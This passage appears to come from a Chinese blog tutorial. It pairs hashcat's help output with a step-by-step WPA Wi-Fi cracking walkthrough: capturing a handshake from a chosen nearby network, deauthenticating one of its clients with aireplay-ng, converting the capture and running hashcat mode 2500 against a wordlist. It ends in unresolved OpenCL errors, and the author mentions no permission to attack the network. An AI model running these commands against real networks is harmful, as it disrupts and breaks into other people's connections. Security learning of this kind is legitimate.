     --bitmap-max              | Num  | Sets maximum bits allowed for bitmaps to X           | --bitmap-min=24
     --cpu-affinity            | Str  | Locks to CPU devices, separate with comma            | --cpu-affinity=1,2,3
     --opencl-platforms        | Str  | OpenCL platforms to use, separate with comma         | --opencl-platforms=2
 -d, --opencl-devices          | Str  | OpenCL devices to use, separate with comma           | -d 1
 -D, --opencl-device-types     | Str  | OpenCL device-types to use, separate with comma      | -D 1
     --opencl-vector-width     | Num  | Manual override OpenCL vector-width to X             | --opencl-vector=4
 -w, --workload-profile        | Num  | Enable a specific workload profile, see pool below   | -w 3
 -n, --kernel-accel            | Num  | Manual workload tuning, set outerloop step size to X | -n 64
 -u, --kernel-loops            | Num  | Manual workload tuning, set innerloop step size to X | -u 256
     --nvidia-spin-damp        | Num  | Workaround NVidias CPU burning loop bug, in percent  | --nvidia-spin-damp=50
     --gpu-temp-disable        |      | Disable temperature and fanspeed reads and triggers  |
     --gpu-temp-abort          | Num  | Abort if GPU temperature reaches X degrees celsius   | --gpu-temp-abort=100
     --gpu-temp-retain         | Num  | Try to retain GPU temperature at X degrees celsius   | --gpu-temp-retain=95
     --powertune-enable        |      | Enable power tuning, restores settings when finished |
     --scrypt-tmto             | Num  | Manually override TMTO value for scrypt to X         | --scrypt-tmto=3
 -s, --skip                    | Num  | Skip X words from the start                          | -s 1000000
 -l, --limit                   | Num  | Limit X words from the start + skipped words         | -l 1000000
     --keyspace                |      | Show keyspace base:mod values and quit               |
 -j, --rule-left               | Rule | Single rule applied to each word from left wordlist  | -j 'c'
 -k, --rule-right              | Rule | Single rule applied to each word from right wordlist | -k '^-'
 -r, --rules-file              | File | Multiple rules applied to each word from wordlists   | -r rules/best64.rule
 -g, --generate-rules          | Num  | Generate X random rules                              | -g 10000
     --generate-rules-func-min | Num  | Force min X funcs per rule                           |
     --generate-rules-func-max | Num  | Force max X funcs per rule                           |
     --generate-rules-seed     | Num  | Force RNG seed set to X                              |
 -1, --custom-charset1         | CS   | User-defined charset ?1                              | -1 ?l?d?u
 -2, --custom-charset2         | CS   | User-defined charset ?2                              | -2 ?l?d?s
 -3, --custom-charset3         | CS   | User-defined charset ?3                              |
 -4, --custom-charset4         | CS   | User-defined charset ?4                              |
 -i, --increment               |      | Enable mask increment mode                           |
     --increment-min           | Num  | Start mask incrementing at X                         | --increment-min=4
     --increment-max           | Num  | Stop mask incrementing at X                          | --increment-max=8

- [ 哈希模式 ] -

      # | Name                                             | 类别
  ======+==================================================+======================================
    900 | MD4                                              | Raw Hash
      0 | MD5                                              | Raw Hash
   5100 | Half MD5                                         | Raw Hash
    100 | SHA1                                             | Raw Hash
  10800 | SHA-384                                          | Raw Hash
   1400 | SHA-256                                          | Raw Hash
   1700 | SHA-512                                          | Raw Hash
   5000 | SHA-3(Keccak)                                    | Raw Hash
  10100 | SipHash                                          | Raw Hash
   6000 | RipeMD160                                        | Raw Hash
   6100 | Whirlpool                                        | Raw Hash
   6900 | GOST R 34.11-94                                  | Raw Hash
  11700 | GOST R 34.11-2012 (Streebog) 256-bit             | Raw Hash
  11800 | GOST R 34.11-2012 (Streebog) 512-bit             | Raw Hash
     10 | md5($pass.$salt)                                 | Raw Hash, Salted and / or Iterated
     20 | md5($salt.$pass)                                 | Raw Hash, Salted and / or Iterated
     30 | md5(unicode($pass).$salt)                        | Raw Hash, Salted and / or Iterated
     40 | md5($salt.unicode($pass))                        | Raw Hash, Salted and / or Iterated
   3800 | md5($salt.$pass.$salt)                           | Raw Hash, Salted and / or Iterated
   3710 | md5($salt.md5($pass))                            | Raw Hash, Salted and / or Iterated
   2600 | md5(md5($pass)                                   | Raw Hash, Salted and / or Iterated
   4300 | md5(strtoupper(md5($pass)))                      | Raw Hash, Salted and / or Iterated
   4400 | md5(sha1($pass))                                 | Raw Hash, Salted and / or Iterated
    110 | sha1($pass.$salt)                                | Raw Hash, Salted and / or Iterated
    120 | sha1($salt.$pass)                                | Raw Hash, Salted and / or Iterated
    130 | sha1(unicode($pass).$salt)                       | Raw Hash, Salted and / or Iterated
    140 | sha1($salt.unicode($pass))                       | Raw Hash, Salted and / or Iterated
   4500 | sha1(sha1($pass)                                 | Raw Hash, Salted and / or Iterated
   4700 | sha1(md5($pass))                                 | Raw Hash, Salted and / or Iterated
   4900 | sha1($salt.$pass.$salt)                          | Raw Hash, Salted and / or Iterated
   1410 | sha256($pass.$salt)                              | Raw Hash, Salted and / or Iterated
   1420 | sha256($salt.$pass)                              | Raw Hash, Salted and / or Iterated
   1430 | sha256(unicode($pass).$salt)                     | Raw Hash, Salted and / or Iterated
   1440 | sha256($salt.unicode($pass))                     | Raw Hash, Salted and / or Iterated
   1710 | sha512($pass.$salt)                              | Raw Hash, Salted and / or Iterated
   1720 | sha512($salt.$pass)                              | Raw Hash, Salted and / or Iterated
   1730 | sha512(unicode($pass).$salt)                     | Raw Hash, Salted and / or Iterated
   1740 | sha512($salt.unicode($pass))                     | Raw Hash, Salted and / or Iterated
     50 | HMAC-MD5 (key = $pass)                           | Raw Hash, Authenticated
     60 | HMAC-MD5 (key = $salt)                           | Raw Hash, Authenticated
    150 | HMAC-SHA1 (key = $pass)                          | Raw Hash, Authenticated
    160 | HMAC-SHA1 (key = $salt)                          | Raw Hash, Authenticated
   1450 | HMAC-SHA256 (key = $pass)                        | Raw Hash, Authenticated
   1460 | HMAC-SHA256 (key = $salt)                        | Raw Hash, Authenticated
   1750 | HMAC-SHA512 (key = $pass)                        | Raw Hash, Authenticated
   1760 | HMAC-SHA512 (key = $salt)                        | Raw Hash, Authenticated
    400 | phpass                                           | Generic KDF
   8900 | scrypt                                           | Generic KDF
  11900 | PBKDF2-HMAC-MD5                                  | Generic KDF
  12000 | PBKDF2-HMAC-SHA1                                 | Generic KDF
  10900 | PBKDF2-HMAC-SHA256                               | Generic KDF
  12100 | PBKDF2-HMAC-SHA512                               | Generic KDF
     23 | Skype                                            | Network protocols
   2500 | WPA/WPA2                                         | Network protocols
   4800 | iSCSI CHAP authentication, MD5(Chap)             | Network protocols
   5300 | IKE-PSK MD5                                      | Network protocols
   5400 | IKE-PSK SHA1                                     | Network protocols
   5500 | NetNTLMv1                                        | Network protocols
   5500 | NetNTLMv1 + ESS                                  | Network protocols
   5600 | NetNTLMv2                                        | Network protocols
   7300 | IPMI2 RAKP HMAC-SHA1                             | Network protocols
   7500 | Kerberos 5 AS-REQ Pre-Auth etype 23              | Network protocols
   8300 | DNSSEC (NSEC3)                                   | Network protocols
  10200 | Cram MD5                                         | Network protocols
  11100 | PostgreSQL CRAM (MD5)                            | Network protocols
  11200 | MySQL CRAM (SHA1)                                | Network protocols
  11400 | SIP digest authentication (MD5)                  | Network protocols
  13100 | Kerberos 5 TGS-REP etype 23                      | Network protocols
    121 | SMF (Simple Machines Forum)                      | Forums, CMS, E-Commerce, Frameworks
    400 | phpBB3                                           | Forums, CMS, E-Commerce, Frameworks
   2611 | vBulletin < v3.8.5                               | Forums, CMS, E-Commerce, Frameworks
   2711 | vBulletin > v3.8.5                               | Forums, CMS, E-Commerce, Frameworks
   2811 | MyBB                                             | Forums, CMS, E-Commerce, Frameworks
   2811 | IPB (Invison Power Board)                        | Forums, CMS, E-Commerce, Frameworks
   8400 | WBB3 (Woltlab Burning Board)                     | Forums, CMS, E-Commerce, Frameworks
     11 | Joomla < 2.5.18                                  | Forums, CMS, E-Commerce, Frameworks
    400 | Joomla > 2.5.18                                  | Forums, CMS, E-Commerce, Frameworks
    400 | Wordpress                                        | Forums, CMS, E-Commerce, Frameworks
   2612 | PHPS                                             | Forums, CMS, E-Commerce, Frameworks
   7900 | Drupal7                                          | Forums, CMS, E-Commerce, Frameworks
     21 | osCommerce                                       | Forums, CMS, E-Commerce, Frameworks
     21 | xt:Commerce                                      | Forums, CMS, E-Commerce, Frameworks
  11000 | PrestaShop                                       | Forums, CMS, E-Commerce, Frameworks
    124 | Django (SHA-1)                                   | Forums, CMS, E-Commerce, Frameworks
  10000 | Django (PBKDF2-SHA256)                           | Forums, CMS, E-Commerce, Frameworks
   3711 | Mediawiki B type                                 | Forums, CMS, E-Commerce, Frameworks
   7600 | Redmine                                          | Forums, CMS, E-Commerce, Frameworks
     12 | PostgreSQL                                       | Database Server
    131 | MSSQL(2000)                                      | Database Server
    132 | MSSQL(2005)                                      | Database Server
   1731 | MSSQL(2012)                                      | Database Server
   1731 | MSSQL(2014)                                      | Database Server
    200 | MySQL323                                         | Database Server
    300 | MySQL4.1/MySQL5                                  | Database Server
   3100 | Oracle H: Type (Oracle 7+)                       | Database Server
    112 | Oracle S: Type (Oracle 11+)                      | Database Server
  12300 | Oracle T: Type (Oracle 12+)                      | Database Server
   8000 | Sybase ASE                                       | Database Server
    141 | EPiServer 6.x < v4                               | HTTP, SMTP, LDAP Server
   1441 | EPiServer 6.x > v4                               | HTTP, SMTP, LDAP Server
   1600 | Apache $apr1$                                    | HTTP, SMTP, LDAP Server
  12600 | ColdFusion 10+                                   | HTTP, SMTP, LDAP Server
   1421 | hMailServer                                      | HTTP, SMTP, LDAP Server
    101 | nsldap, SHA-1(Base64), Netscape LDAP SHA         | HTTP, SMTP, LDAP Server
    111 | nsldaps, SSHA-1(Base64), Netscape LDAP SSHA      | HTTP, SMTP, LDAP Server
   1711 | SSHA-512(Base64), LDAP {SSHA512}                 | HTTP, SMTP, LDAP Server
  11500 | CRC32                                            | Checksums
   3000 | LM                                               | Operating-Systems
   1000 | NTLM                                             | Operating-Systems
   1100 | Domain Cached Credentials (DCC), MS Cache        | Operating-Systems
   2100 | Domain Cached Credentials 2 (DCC2), MS Cache 2   | Operating-Systems
  12800 | MS-AzureSync PBKDF2-HMAC-SHA256                  | Operating-Systems
   1500 | descrypt, DES(Unix), Traditional DES             | Operating-Systems
  12400 | BSDiCrypt, Extended DES                          | Operating-Systems
    500 | md5crypt $1$, MD5(Unix)                          | Operating-Systems
   3200 | bcrypt $2*$, Blowfish(Unix)                      | Operating-Systems
   7400 | sha256crypt $5$, SHA256(Unix)                    | Operating-Systems
   1800 | sha512crypt $6$, SHA512(Unix)                    | Operating-Systems
    122 | OSX v10.4, OSX v10.5, OSX v10.6                  | Operating-Systems
   1722 | OSX v10.7                                        | Operating-Systems
   7100 | OSX v10.8, OSX v10.9, OSX v10.10                 | Operating-Systems
   6300 | AIX {smd5}                                       | Operating-Systems
   6700 | AIX {ssha1}                                      | Operating-Systems
   6400 | AIX {ssha256}                                    | Operating-Systems
   6500 | AIX {ssha512}                                    | Operating-Systems
   2400 | Cisco-PIX                                        | Operating-Systems
   2410 | Cisco-ASA                                        | Operating-Systems
    500 | Cisco-IOS $1$                                    | Operating-Systems
   5700 | Cisco-IOS $4$                                    | Operating-Systems
   9200 | Cisco-IOS $8$                                    | Operating-Systems
   9300 | Cisco-IOS $9$                                    | Operating-Systems
     22 | Juniper Netscreen/SSG (ScreenOS)                 | Operating-Systems
    501 | Juniper IVE                                      | Operating-Systems
   5800 | Android PIN                                      | Operating-Systems
  13800 | Windows 8+ phone PIN/Password                    | Operating-Systems
   8100 | Citrix Netscaler                                 | Operating-Systems
   8500 | RACF                                             | Operating-Systems
   7200 | GRUB 2                                           | Operating-Systems
   9900 | Radmin2                                          | Operating-Systems
    125 | ArubaOS                                          | Operating-Systems
   7700 | SAP CODVN B (BCODE)                              | Enterprise Application Software (EAS)
   7800 | SAP CODVN F/G (PASSCODE)                         | Enterprise Application Software (EAS)
  10300 | SAP CODVN H (PWDSALTEDHASH) iSSHA-1              | Enterprise Application Software (EAS)
   8600 | Lotus Notes/Domino 5                             | Enterprise Application Software (EAS)
   8700 | Lotus Notes/Domino 6                             | Enterprise Application Software (EAS)
   9100 | Lotus Notes/Domino 8                             | Enterprise Application Software (EAS)
    133 | PeopleSoft                                       | Enterprise Application Software (EAS)
  13500 | PeopleSoft Token                                 | Enterprise Application Software (EAS)
  11600 | 7-Zip                                            | Archives
  12500 | RAR3-hp                                          | Archives
  13000 | RAR5                                             | Archives
  13200 | AxCrypt                                          | Archives
  13300 | AxCrypt in memory SHA1                           | Archives
  13600 | WinZip                                           | Archives
   62XY | TrueCrypt                                        | Full-Disk encryptions (FDE)
     X  | 1 = PBKDF2-HMAC-RipeMD160                        | Full-Disk encryptions (FDE)
     X  | 2 = PBKDF2-HMAC-SHA512                           | Full-Disk encryptions (FDE)
     X  | 3 = PBKDF2-HMAC-Whirlpool                        | Full-Disk encryptions (FDE)
     X  | 4 = PBKDF2-HMAC-RipeMD160 + boot-mode            | Full-Disk encryptions (FDE)
      Y | 1 = XTS  512 bit pure AES                        | Full-Disk encryptions (FDE)
      Y | 1 = XTS  512 bit pure Serpent                    | Full-Disk encryptions (FDE)
      Y | 1 = XTS  512 bit pure Twofish                    | Full-Disk encryptions (FDE)
      Y | 2 = XTS 1024 bit pure AES                        | Full-Disk encryptions (FDE)
      Y | 2 = XTS 1024 bit pure Serpent                    | Full-Disk encryptions (FDE)
      Y | 2 = XTS 1024 bit pure Twofish                    | Full-Disk encryptions (FDE)
      Y | 2 = XTS 1024 bit cascaded AES-Twofish            | Full-Disk encryptions (FDE)
      Y | 2 = XTS 1024 bit cascaded Serpent-AES            | Full-Disk encryptions (FDE)
      Y | 2 = XTS 1024 bit cascaded Twofish-Serpent        | Full-Disk encryptions (FDE)
      Y | 3 = XTS 1536 bit all                             | Full-Disk encryptions (FDE)
   8800 | Android FDE < v4.3                               | Full-Disk encryptions (FDE)
  12900 | Android FDE (Samsung DEK)                        | Full-Disk encryptions (FDE)
  12200 | eCryptfs                                         | Full-Disk encryptions (FDE)
  137XY | VeraCrypt                                        | Full-Disk encryptions (FDE)
     X  | 1 = PBKDF2-HMAC-RipeMD160                        | Full-Disk encryptions (FDE)
     X  | 2 = PBKDF2-HMAC-SHA512                           | Full-Disk encryptions (FDE)
     X  | 3 = PBKDF2-HMAC-Whirlpool                        | Full-Disk encryptions (FDE)
     X  | 4 = PBKDF2-HMAC-RipeMD160 + boot-mode            | Full-Disk encryptions (FDE)
     X  | 5 = PBKDF2-HMAC-SHA256                           | Full-Disk encryptions (FDE)
     X  | 6 = PBKDF2-HMAC-SHA256 + boot-mode               | Full-Disk encryptions (FDE)
      Y | 1 = XTS  512 bit pure AES                        | Full-Disk encryptions (FDE)
      Y | 1 = XTS  512 bit pure Serpent                    | Full-Disk encryptions (FDE)
      Y | 1 = XTS  512 bit pure Twofish                    | Full-Disk encryptions (FDE)
      Y | 2 = XTS 1024 bit pure AES                        | Full-Disk encryptions (FDE)
      Y | 2 = XTS 1024 bit pure Serpent                    | Full-Disk encryptions (FDE)
      Y | 2 = XTS 1024 bit pure Twofish                    | Full-Disk encryptions (FDE)
      Y | 2 = XTS 1024 bit cascaded AES-Twofish            | Full-Disk encryptions (FDE)
      Y | 2 = XTS 1024 bit cascaded Serpent-AES            | Full-Disk encryptions (FDE)
      Y | 2 = XTS 1024 bit cascaded Twofish-Serpent        | Full-Disk encryptions (FDE)
      Y | 3 = XTS 1536 bit all                             | Full-Disk encryptions (FDE)
   9700 | MS Office <= 2003 $0|$1, MD5 + RC4               | Documents
   9710 | MS Office <= 2003 $0|$1, MD5 + RC4, collider #1  | Documents
   9720 | MS Office <= 2003 $0|$1, MD5 + RC4, collider #2  | Documents
   9800 | MS Office <= 2003 $3|$4, SHA1 + RC4              | Documents
   9810 | MS Office <= 2003 $3|$4, SHA1 + RC4, collider #1 | Documents
   9820 | MS Office <= 2003 $3|$4, SHA1 + RC4, collider #2 | Documents
   9400 | MS Office 2007                                   | Documents
   9500 | MS Office 2010                                   | Documents
   9600 | MS Office 2013                                   | Documents
  10400 | PDF 1.1 - 1.3 (Acrobat 2 - 4)                    | Documents
  10410 | PDF 1.1 - 1.3 (Acrobat 2 - 4), collider #1       | Documents
  10420 | PDF 1.1 - 1.3 (Acrobat 2 - 4), collider #2       | Documents
  10500 | PDF 1.4 - 1.6 (Acrobat 5 - 8)                    | Documents
  10600 | PDF 1.7 Level 3 (Acrobat 9)                      | Documents
  10700 | PDF 1.7 Level 8 (Acrobat 10 - 11)                | Documents
   9000 | Password Safe v2                                 | Password Managers
   5200 | Password Safe v3                                 | Password Managers
   6800 | Lastpass + Lastpass sniffed                      | Password Managers
   6600 | 1Password, agilekeychain                         | Password Managers
   8200 | 1Password, cloudkeychain                         | Password Managers
  11300 | Bitcoin/Litecoin wallet.dat                      | Password Managers
  12700 | Blockchain, My Wallet                            | Password Managers
  13400 | Keepass 1 (AES/Twofish) and Keepass 2 (AES)      | Password Managers

- [ 导出的文件格式 ] -

  # | 格式
 ===+========
  1 | hash[:salt]
  2 | plain
  3 | hash[:salt]:plain
  4 | hex_plain
  5 | hash[:salt]:hex_plain
  6 | plain:hex_plain
  7 | hash[:salt]:plain:hex_plain
  8 | crackpos
  9 | hash[:salt]:crack_pos
 10 | plain:crack_pos
 11 | hash[:salt]:plain:crack_pos
 12 | hex_plain:crack_pos
 13 | hash[:salt]:hex_plain:crack_pos
 14 | plain:hex_plain:crack_pos
 15 | hash[:salt]:plain:hex_plain:crack_pos

- [ 规则的调试模式 ] -

  # | Format
 ===+========
  1 | Finding-Rule
  2 | Original-Word
  3 | Original-Word:Finding-Rule
  4 | Original-Word:Finding-Rule:Processed-Word

- [ 攻击模式 ] -

  # | Mode
 ===+======
  0 | Straight                  (字典破解)
  1 | Combination               (组合破解)
  3 | Brute-force
  6 | Hybrid Wordlist + Mask    (掩码暴力破解)
  7 | Hybrid Mask + Wordlist    

- [ 内置的字符集 ] -

  ? | Charset
 ===+=========
  l | abcdefghijklmnopqrstuvwxyz
  u | ABCDEFGHIJKLMNOPQRSTUVWXYZ
  d | 0123456789
  s |  !"#$%&'()*+,-./:;<=>?@[\]^_`{|}~
  a | ?l?u?d?s
  b | 0x00 - 0xff

- [ OpenCL设备类型 ] -

  # | Device Type
 ===+=============
  1 | CPU
  2 | GPU
  3 | FPGA, DSP, Co-Processor

- [ 工作简介 ] -

  # | Performance | Runtime | Power Consumption | Desktop Impact
 ===+=============+=========+===================+=================
  1 | Low         |   2 ms  | Low               | Minimal
  2 | Default     |  12 ms  | Economic          | Noticeable
  3 | High        |  96 ms  | High              | Unresponsive
  4 | Nightmare   | 480 ms  | Insane            | Headless

- [ 基本的例子 ] -

  Attack-          | Hash- |
  Mode             | Type  | Example command
 ==================+=======+==================================================================
  Wordlist         | $P$   | hashcat -a 0 -m 400 example400.hash example.dict
  Wordlist + Rules | MD5   | hashcat -a 0 -m 0 example0.hash example.dict -r rules/best64.rule
  Brute-Force      | MD5   | hashcat -a 3 -m 0 example0.hash ?a?a?a?a?a?a
  Combinator       | MD5   | hashcat -a 1 -m 0 example0.hash example.dict example.dict

If you still have no idea what just happened try following pages:

* https://hashcat.net/wiki/#howtos_videos_papers_articles_etc_in_the_wild
* https://hashcat.net/wiki/#frequently_asked_questions


二、破解实战

第一步: 开始抓包

先扫描附近的wifi

[html] view plain copy print?
  1. root@kali:~# airodump-ng wlan0mon   
root@kali:~# airodump-ng wlan0mon



然后选择你想要破解的那个wifi,复制他的bssid,CH然后执行下面的命令,这里我选择D13来破解


[html] view plain copy print?
  1. root@kali:~# airodump-ng -c 5 --bssid 1C:60:DE:E1:48:A3  -w d13 wlan0mon   
root@kali:~# airodump-ng -c 5 --bssid 1C:60:DE:E1:48:A3  -w d13 wlan0mon


然后让他下线,从新连接

[html] view plain copy print?
  1. root@kali:~# aireplay-ng -0 50 -a 1C:60:DE:E1:48:A3 -c 48:3C:0C:AA:DB:67 wlan0mon   
root@kali:~# aireplay-ng -0 50 -a 1C:60:DE:E1:48:A3 -c 48:3C:0C:AA:DB:67 wlan0mon



第二步: 转格式


把airodump抓到的 握手文件转换为hccap的格式

[html] view plain copy print?
  1. root@kali:~# aircrack-ng d13-02.cap -J wpahashcat  
  2. Opening d13-02.cap  
  3. Read 50846 packets.  
  4.   
  5.    #  BSSID              ESSID                     Encryption  
  6.   
  7.    1  1C:60:DE:E1:48:A3  Haiyi-D13                 WPA (1 handshake)  
  8.   
  9. Choosing first network as target.  
  10.   
  11. Opening d13-02.cap  
  12. Reading packets, please wait...  
  13.   
  14. Building Hashcat (1.00) file...  
  15.   
  16. [*] ESSID (length: 9): Haiyi-D13  
  17. [*] Key version: 2  
  18. [*] BSSID: 1C:60:DE:E1:48:A3  
  19. [*] STA: 48:3C:0C:AA:DB:67  
  20. [*] anonce:  
  21.     D2 D3 70 E9 84 92 A2 C4 C7 2E C2 98 1B 1B 03 9B   
  22.     7E FA B0 86 3D CC 14 6B EC 0F 55 B5 E5 5C 6B 51   
  23. [*] snonce:  
  24.     72 6A E1 6C 7E BD 20 06 4F 39 D7 7C EA BD DD 41   
  25.     86 1E 55 F6 0F 7E C9 44 F2 C6 FD B1 F9 56 65 56   
  26. [*] Key MIC:  
  27.     1B 4F 03 49 D6 85 51 F4 C3 D7 68 07 BE 9A 64 70  
  28. [*] eapol:  
  29.     01 03 00 75 02 01 0A 00 00 00 00 00 00 00 00 00   
  30.     01 72 6A E1 6C 7E BD 20 06 4F 39 D7 7C EA BD DD   
  31.     41 86 1E 55 F6 0F 7E C9 44 F2 C6 FD B1 F9 56 65   
  32.     56 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00   
  33.     00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00   
  34.     00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00   
  35.     00 00 16 30 14 01 00 00 0F AC 04 01 00 00 0F AC   
  36.     04 01 00 00 0F AC 02 80 00   
  37.   
  38. Successfully written to wpahashcat.hccap  
  39.   
  40.   
  41. Quitting aircrack-ng...  
root@kali:~# aircrack-ng d13-02.cap -J wpahashcat
Opening d13-02.cap
Read 50846 packets.

   #  BSSID              ESSID                     Encryption

   1  1C:60:DE:E1:48:A3  Haiyi-D13                 WPA (1 handshake)

Choosing first network as target.

Opening d13-02.cap
Reading packets, please wait...

Building Hashcat (1.00) file...

[*] ESSID (length: 9): Haiyi-D13
[*] Key version: 2
[*] BSSID: 1C:60:DE:E1:48:A3
[*] STA: 48:3C:0C:AA:DB:67
[*] anonce:
    D2 D3 70 E9 84 92 A2 C4 C7 2E C2 98 1B 1B 03 9B 
    7E FA B0 86 3D CC 14 6B EC 0F 55 B5 E5 5C 6B 51 
[*] snonce:
    72 6A E1 6C 7E BD 20 06 4F 39 D7 7C EA BD DD 41 
    86 1E 55 F6 0F 7E C9 44 F2 C6 FD B1 F9 56 65 56 
[*] Key MIC:
    1B 4F 03 49 D6 85 51 F4 C3 D7 68 07 BE 9A 64 70
[*] eapol:
    01 03 00 75 02 01 0A 00 00 00 00 00 00 00 00 00 
    01 72 6A E1 6C 7E BD 20 06 4F 39 D7 7C EA BD DD 
    41 86 1E 55 F6 0F 7E C9 44 F2 C6 FD B1 F9 56 65 
    56 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 
    00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 
    00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 
    00 00 16 30 14 01 00 00 0F AC 04 01 00 00 0F AC 
    04 01 00 00 0F AC 02 80 00 

Successfully written to wpahashcat.hccap


Quitting aircrack-ng...


第三步:进行密码破解

[html] view plain copy print?
  1. root@kali:~# hashcat -m 2500 wpahashcat.hccap /root/桌面/paswd.txt    
root@kali:~# hashcat -m 2500 wpahashcat.hccap /root/桌面/paswd.txt




报错....Generating bitmap tables with 16 bits.....VMware:No 3D enabled (0,Success).


或者这种错: 


hashcat (v3.10) starting...

Generating bitmap tables with 16 bits...VMware: No 3D enabled (0, Success).
OpenCL Platform #1: Mesa, skipped! No OpenCL compatible devices found

ERROR: No devices found/left




ERROR: No devices found/left 这种错误的话是没有安装OpenCL导致的,去下面的页面


software.intel.com/en-us/artic…



下载下来,解压安装

[html] view plain copy print?
  1. root@kali:~/文档# mkdir open  
  2. root@kali:~/文档# mv SRB4.1_linux64.zip open  
  3. root@kali:~/文档# cd open/  
  4. root@kali:~/文档/open# unzip SRB4.1_linux64.zip   
  5. Archive:  SRB4.1_linux64.zip  
  6.   inflating: intel-opencl-cpu-r4.1-61547.x86_64.rpm    
  7.   inflating: intel-opencl-cpu-r4.1-61547.x86_64.tar.xz    
  8.   inflating: intel-opencl-cpu-r4.1-61547.x86_64.tar.xz.sig    
  9.   inflating: intel-opencl-devel-r4.1-61547.x86_64.rpm    
  10.   inflating: intel-opencl-devel-r4.1-61547.x86_64.tar.xz    
  11.   inflating: intel-opencl-devel-r4.1-61547.x86_64.tar.xz.sig    
  12.   inflating: intel-opencl-r4.1-61547.x86_64.rpm    
  13.   inflating: intel-opencl-r4.1-61547.x86_64.tar.xz    
  14.   inflating: intel-opencl-r4.1-61547.x86_64.tar.xz.sig    
  15.   inflating: vpg_ocl_linux_rpmdeb.public   
  16.     
  17. root@kali:~/文档/open# mkdir intel-opencl  
  18.   
  19. root@kali:~/文档/open# tar -C intel-opencl -Jxf intel-opencl-r4.1-61547.x86_64.tar.xz  
  20.   
  21. root@kali:~/文档/open# tar -C intel-opencl -Jxf intel-opencl-devel-r4.1-61547.x86_64.tar.xz  
  22.   
  23. root@kali:~/文档/open# tar -C intel-opencl -Jxf intel-opencl-cpu-r4.1-61547.x86_64.tar.xz  
  24.   
  25. root@kali:~/文档/open# cp -R intel-opencl/* /  
  26. root@kali:~/文档/open# ldconfig  
  27. root@kali:~/文档/open# reboot  
root@kali:~/文档# mkdir open
root@kali:~/文档# mv SRB4.1_linux64.zip open
root@kali:~/文档# cd open/
root@kali:~/文档/open# unzip SRB4.1_linux64.zip 
Archive:  SRB4.1_linux64.zip
  inflating: intel-opencl-cpu-r4.1-61547.x86_64.rpm  
  inflating: intel-opencl-cpu-r4.1-61547.x86_64.tar.xz  
  inflating: intel-opencl-cpu-r4.1-61547.x86_64.tar.xz.sig  
  inflating: intel-opencl-devel-r4.1-61547.x86_64.rpm  
  inflating: intel-opencl-devel-r4.1-61547.x86_64.tar.xz  
  inflating: intel-opencl-devel-r4.1-61547.x86_64.tar.xz.sig  
  inflating: intel-opencl-r4.1-61547.x86_64.rpm  
  inflating: intel-opencl-r4.1-61547.x86_64.tar.xz  
  inflating: intel-opencl-r4.1-61547.x86_64.tar.xz.sig  
  inflating: vpg_ocl_linux_rpmdeb.public 
  
root@kali:~/文档/open# mkdir intel-opencl

root@kali:~/文档/open# tar -C intel-opencl -Jxf intel-opencl-r4.1-61547.x86_64.tar.xz

root@kali:~/文档/open# tar -C intel-opencl -Jxf intel-opencl-devel-r4.1-61547.x86_64.tar.xz

root@kali:~/文档/open# tar -C intel-opencl -Jxf intel-opencl-cpu-r4.1-61547.x86_64.tar.xz

root@kali:~/文档/open# cp -R intel-opencl/* /
root@kali:~/文档/open# ldconfig
root@kali:~/文档/open# reboot


3D图形没打开,然后关闭虚拟机,勾上下面那个勾




启动Kali...继续执行破解密码命令又报下面的错:


ERROR: clGet DeviceIDS() : -1 CL_DEVICE_NOT_FOUND




在google上找到了解决方法:hashcat.net/wiki/doku.p…


大概意思是GPU内存不足,把内存改大一点就行了




还报错:




执行:


[html] view plain copy print?
  1. root@kali:~# export DISPLAY=:0   
root@kali:~# export DISPLAY=:0


然后在执行命令,又报错:

Generating bitmap tables with 16 bits...段错误


在网上找了几个小时都没找到解决方法。。。不报这个错的话,就能直接把密码破解出来。。。

avatar
文章
阅读
粉丝